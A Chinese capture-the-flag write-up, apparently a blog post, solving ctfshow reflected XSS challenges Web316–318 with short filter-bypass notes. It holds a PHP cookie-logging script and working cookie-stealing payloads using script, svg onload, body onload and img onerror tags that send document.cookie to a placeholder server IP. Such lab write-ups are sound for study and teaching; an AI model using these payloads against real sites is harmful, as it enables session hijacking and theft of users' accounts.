ctfshow(316,317,318)--XSS漏洞--反射性XSS

反射型XSS相关知识

Web316

进入界面:

审计

显示是关于反射性XSS的题目。

思路

首先想到利用XSS平台解题,看其他师傅的wp提示flag是在cookie中。

当前页面的cookie是flag=you%20are%20not%20admin%20no%20flag。

但是这里我使用XSS平台,显示的cookie还是这样,并不能得到flag。该方法先作罢。

于是我们使用稳定性更高的方法:写js代码将cookie传到自己的服务器上。

先在服务器写一个php文件:

php 复制代码
//flag.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

然后在靶机中传入如下代码:

php 复制代码
<script>location.href="http://[自己服务器的IP]/flag.php?cookie="+document.cookie</script>

提交之后成功跳转到自己的网页。

查看自己服务器中的cookie.txt文件,得到flag。

Web317

界面与上一题相同。

但是过滤了<script>,大小写混写也不能使用。

考虑使用HTML的其他标签。

这道题我们使用<svg>与onload属性

php 复制代码
<svg onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

//svg 是用于绘图的标签
//onload事件 是页面加载成功后执行的事件

得到flag.

其他形式的payload:

php 复制代码
//body标签也支持onload事件
<body onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

//img标签支持onerror属性。当图片加载发生了错误,就会触发该事件
<img src='#' onerror="window.location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

Web318

和上一题相同,不过多过滤了img标签。

使用body或者svg标签即可。

php 复制代码
<body onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

<svg onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

得到flag.

相关推荐
Y学院7 小时前
网络安全基础核心知识点教程
网络·web安全·php
德迅云安全-小潘8 小时前
游戏行业网络安全态势分析与应对
安全·web安全·游戏
网络安全实验室12 小时前
【程序人生】程序员接私活常用平台汇总_嵌入式开发外包平台
网络·python·学习·程序人生·web安全·面试·职场和发展
网络安全许木13 小时前
自学渗透测试第19天(ARP欺骗原理与Ettercap实战)
网络·web安全·渗透测试
Chengbei1113 小时前
业务视角下的金融SRC快速挖掘思路
网络·安全·web安全·网络安全·金融·系统安全·网络攻击模型
姬成韶13 小时前
BUUCTF--[网鼎杯 2020 朱雀组]phpweb
web安全·网络安全·代码审计
一名优秀的码农13 小时前
vulhub系列-73-RA1NXing Bots(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
Y学院13 小时前
隐蔽防线,智护互联——网络安全隧道技术的核心价值与实践应用
web安全·网络安全
xixixi7777714 小时前
Gartner 2026核心趋势:前置式主动安全(PCS)成为安全战略新范式,量子安全+国密算法构筑政企纵深防御底座
网络·人工智能·安全·web安全·ai·量子计算
Tattoo_Welkin14 小时前
web安全登录协议-EIP-4361 和 JWT 验证 以及RSA,ECDSA 算法
算法·web安全·区块链